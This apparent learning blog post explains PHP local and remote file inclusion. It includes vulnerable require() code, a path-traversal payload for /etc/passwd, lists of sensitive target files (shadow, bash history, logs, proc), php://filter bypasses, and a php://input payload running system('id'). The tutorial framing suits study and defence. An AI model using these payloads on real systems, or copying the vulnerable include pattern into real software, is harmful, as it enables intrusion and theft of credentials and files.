[Learning] All about LFI - Local File Inclusion

 I. What is Local File Inclusion

Local File Inclusion (LFI) means unauthorized access to files on the system. This vulnerability exists when a web application includes a file without correctly sanitizing the input, allowing and attacker to manipulate the input and inject path traversal characters and include other files from the web server. This vulnerability lets the attacker gain access to sensitive files on the server, and it might also lead to gaining a shell.

Vulnerable code in php :

It arises when a php file contains some php functions such as “include”, “include_once”, “require”, “require_once”.

$file = $_GET['page'];
require($file);

$file = $_GET['page'];
require($file . ".php");

II. Identifying LFI Vulnerabilities within Web Applications

+ Format URL may related to LFI :

http://example.com/page=filename[.extension]

http://example.com/view=filename[.extension]

http://example.com/file=filename[.extension]

More:

?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}

+ Sometimes, web application declare an error 

+How to test : try to retrieve /etc/passwd file ( in some case  , this technique similar to Path Traversal )

http://example.com/page=../../../../etc/passwd




If success, we got all content of passwd file :




And we can move on to another file which contains sensitive about server




III. How to exploit

1. List file must focus:

/etc/issue (A message or system identification to be printed before the login prompt.) /etc/motd (Message of the day banner content. Can contain information about the system owners or use of the system.) /etc/passwd /etc/group /etc/resolv.conf (might be better than /etc/passwd for triggering IDS sigs) /etc/shadow /home/[USERNAME]/.bash_history or .profile ~/.bash_history or .profile $USER/.bash_history or .profile /root/.bash_history or .profile /etc/mtab /etc/inetd.conf /var/log/dmessage

LOG files

/etc/httpd/logs/acces_log /etc/httpd/logs/error_log /var/www/logs/access_log /var/www/logs/access.log /usr/local/apache/logs/access_log /usr/local/apache/logs/access.log /var/log/apache/access_log /var/log/apache2/access_log /var/log/apache/access.log /var/log/apache2/access.log /var/log/access_log




PROC files




/proc/sched_debug # Can be used to see what processes the machine is running /proc/mounts /proc/net/arp /proc/net/route /proc/net/tcp /proc/net/udp /proc/net/fib_trie /proc/version /proc/self/environ




2. Bypassing Php-excution




When you access file with LFI, you can easily read .txt file. But with .php file,

you cant read the content by normal method, because of php-execution.

That is because they get executed by the webserver, since their file-ending says that it contains code.

This can be bypassed by using a build-in php-filter.







php://filter/convert.base64-encode/resource=index

It will convert all php code into base64 format, so we just copy all base64 code appear and decode it to view code content of that .php file.

We can try all payloads below to bypass some WAF:

php://filter/read=string.rot13/resource=index.php php://filter/convert.base64-encode/resource=index.php pHp://FilTer/convert.base64-encode/resource=index.php

3. Test for RFI




Remote file inclusion aka RFI occurs when an application receives a path to a file as input for a web page and does not properly sanitize it. This allows an external URL to be supplied to the include function.

Payload

?page=<url>

If  LFI site load content of the site which have URL we provied , It absolutely vulnerable to RFI. We can easily upload out shell from this input to the server.

3. LFI to RCE 

+ What is RCE : RCE stands for Remote Code Excution ( also known as Arbitrary code execution)  

Remote Code Evaluation is a vulnerability that can be exploited if user input is injected into a File or a String and executed (evaluated) by the programming language's parser. Usually this behavior is not intended by the developer of the web application. A Remote Code Evaluation can lead to a full compromise of the vulnerable web application and also web server. It is important to note that almost every programming language has code evaluation functions.

 So we have many scenarios that LFI lead to RCE , let's review !

# LFI → RCE via php Wrapper

+PHP wrapper expect://command

All about PHP expect wrapper :

https://www.php.net/manual/en/wrappers.expect.php

PHP expect:// allows execution of system commands, unfortunately the expect PHP module is not enabled by default. It's require to install extension. 

+PHP wrapper php://input

Then we can send POST requst

POST DATA: <?php system('id'); ?>

Example



+Php wrapper ZIP://

I have a post about this using Rootme challenge as example

https://www.4rth4s.xyz/2020/06/root-me-local-file-inclusion-wrappers.html